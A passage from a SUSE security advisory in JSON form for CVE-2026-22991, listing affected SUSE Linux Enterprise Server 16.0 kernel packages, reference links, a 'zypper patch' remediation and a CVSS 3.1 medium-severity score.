"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
